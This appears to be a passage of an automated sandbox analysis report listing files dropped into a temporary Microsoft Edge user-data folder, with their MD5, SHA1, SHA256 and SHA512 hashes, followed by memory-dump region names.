SHA512 789735b58657015527bb8bcddcf4a0a3a3871cb89b02bbf96beaa39635c3fb1e800884d346937bedf28894acb6b9ce54507f2f0494d14daf7ae4c128f4f478de

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

MD5 d30bfa66491904286f1907f46212dd72
SHA1 9f56e96a6da2294512897ea2ea76953a70012564
SHA256 25bee9c6613b6a2190272775a33471a3280bd9246c386b72d872dc6d6dd90907
SHA512 44115f5aaf16bd3c8767bfb5610eba1986369f2e91d887d20a9631807c58843434519a12c9fd23af38c6adfed4dbf8122258279109968b37174a001320839237

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

MD5 3bf275ad7c396401afb4c58a726ad1b6
SHA1 96bf533576e086a90bd1a6618dd68e940d1e9560
SHA256 f52768ee3e6f25ea1894eb1c4bb7d0feb89efab07cd2fb169bc71a2122faf0b1
SHA512 79af46b585a913f7b03c410ff38004effc98fb074107e90592d98c4fefd668bef7ec76f4c710f692cc71b6d41ee613905483e539d1327d6be49a0d374cbc9e36

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

MD5 4dc07f048d4ac1b79422c1eb88811fe6
SHA1 233b62d3cec8bd3358586039e515205c1ace756d
SHA256 9970a2f9e7e732b0db9ebac0614fe41a368ec18307745f3f3415e3de31ca76bf
SHA512 6ef760d350adc8a7d1296671677edc6f4939df8199151ed8a9632e681c28bfcc903a473012f57e65d42aa075deca597e9cedee086823938308df05053908bff3

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log

MD5 9082ba76dad3cf4f527b8bb631ef4bb2
SHA1 4ab9c4a48c186b029d5f8ad4c3f53985499c21b0
SHA256 bff851dedf8fc3ce1f59e7bcd3a39f9e23944bc7e85592a94131e20fd9902ddd
SHA512 621e39d497dece3f3ddf280e23d4d42e4be8518e723ecb82b48f8d315fc8a0b780abe6c7051c512d7959a1f1def3b10b5ed229d1a296443a584de6329275eb40

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\the-real-index

MD5 022386cc3c3c5825dfda70b333ddf17d
SHA1 07bcd09dba14c39094820b2797b4cc7626875f52
SHA256 c8a0954090200663d5cd4d83f10a16d7191d67ad92e46cb1d0c88880a22c4a72
SHA512 ec4a138c29b66c688a8a9f2e514b3c2cf535d393ca5485e10ab71c2df617613202ed32a16dffff805ab39d9fdfad61c570657053e21b62661ee5794386f35378

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG

MD5 5da85fd80d54bc35db1d1f82d4b57847
SHA1 075182b1982af8bc3c7f3bd8f1520a8790aa1a29
SHA256 b0d4091b7f9ac6d4a93b303fdc65c4c7e73d17e04728744435a708c76f3a6b3d
SHA512 db56332537c798e7248e7f11d96605f2d1ec69c515c9230acc449e2c0d43939cc54e09906c786375a9e9a71aca3e8a8694307e720c79732fd989d0730e8b5f22

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

MD5 69449520fd9c139c534e2970342c6bd8
SHA1 230fe369a09def748f8cc23ad70fd19ed8d1b885
SHA256 3f2e9648dfdb2ddb8e9d607e8802fef05afa447e17733dd3fd6d933e7ca49277
SHA512 ea34c39aea13b281a6067de20ad0cda84135e70c97db3cdd59e25e6536b19f7781e5fc0ca4a11c3618d43fc3bd3fbc120dd5c1c47821a248b8ad351f9f4e6367

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

MD5 6d2b7b3c96a42d8f598a5509ea208152
SHA1 d6409dbbc40cf3f3e48305d06f0cc15e50d567f2
SHA256 b03a4ed7b59905ff6db2196d0465ae815b69825f5fee7f41247f0df85518810a
SHA512 f55ad919350df6a2f94897ff12ab830dffa5fc803267a3ed7cd8deb17fa75a12a21350d656d618d9180e298dc999f9be0eb72d21865e1614148d06c8fe0e43b4

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\000003.log

MD5 dd96c3d18ccee2b337329ee6148f5365
SHA1 852dfc79d51056c2d00b5a11412bf56f18339118
SHA256 ddf868068aa56839e33412ae519cc65b6bd6b2288031af595cb08328d0d8105f
SHA512 8da60c4a70cddf13515b2164a8c34ea6b1f0a69a376351361184010d92e3147d905333e613959c54587502c7b8391964e47ef743fa807e07ed84d3678ce7be13

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG

MD5 2052176101a69ecae319b5b52c74c56f
SHA1 74afdb00b0fcfa72f4812caba168fc3d6d7b5914
SHA256 12db76ace1027ce3847b3b37ea27bead4465064f80c568ee800e97ee07ecda2c
SHA512 e5470ea27a02ea1d5160250f2a7068aa132c08ea534b4ae57d94c1b765a88c0304f56fc2961d3f5753c09ad780de94701a5da0dfd984aebb5832380ee4dbe499

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log

MD5 b95198162663b0fdb17ef552e7b0c74f
SHA1 a105b519b629b9e5d4c46609d4f2e025984d7f01
SHA256 9f3d9094d90e8468735211f6cd88cbc2b9db14eb06a446cba9d1006253eba95a
SHA512 3021377bcb6ff42d926635553f8bec8763b509b2f90dc23820b3c8e714dedec9ebe50ef877388f5a07721ee7261d0600e9ca81a69184a97165fcf503087236d1

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG

MD5 58abff5a0981712b821c09950b0ac3c1
SHA1 682df90e194a1a3b574632ba8c7812798a2e9084
SHA256 8e16400dbd56bf7ddcb0c095156b5df454c3bd231226a263d2f85b860275bc77
SHA512 0254445052bed0f3a2be4a885d07ca46d898f9bcc07ee09b2e85186112e6b5437cc5af2df558163e2d8138abeb5c8d5cf78d12e4c309954e8c825e14baadf3fc

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

MD5 f2e482301eaf613a55b18eeba2b990aa
SHA1 f937b1f73128831ad3ca2578b3d316445953889e
SHA256 efa4f44b4247644c5f6012ff32da85449747c3f8d9add69d7a6fab7919e9ade1
SHA512 ce435853d9fc1c0287b69cc1a18a3af79d84fed1934ca4b7f7a029b62822959da31b4d8595d3703aa15102e2fbd3ec0440645f18cfae270bdd864499328ced3d

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

MD5 7a298cd81d0f02ae14896fa0ab77528c
SHA1 98069018459eb6d6e7fe7db717c26bea1027e0ef
SHA256 a4e2e9d6011487d7ba5e59ef3d49e24edcf7474826913caad2f0587e832857b5
SHA512 daa33602a0ceff0aa772226f9a806daf1cf14c409e457c6b4698b9d53e541ef964cddb2f33d505f29e528d1b9932e56afe47023e073612c10091a0af67ce672e

memory/2720-376-0x0000000000E00000-0x0000000002054000-memory.dmp

memory/2720-382-0x0000000000E00000-0x0000000002054000-memory.dmp

memory/2720-385-0x0000000000E00000-0x0000000002054000-memory.dmp

memory/2720-388-0x0000000000E00000-0x0000000002054000-memory.dmp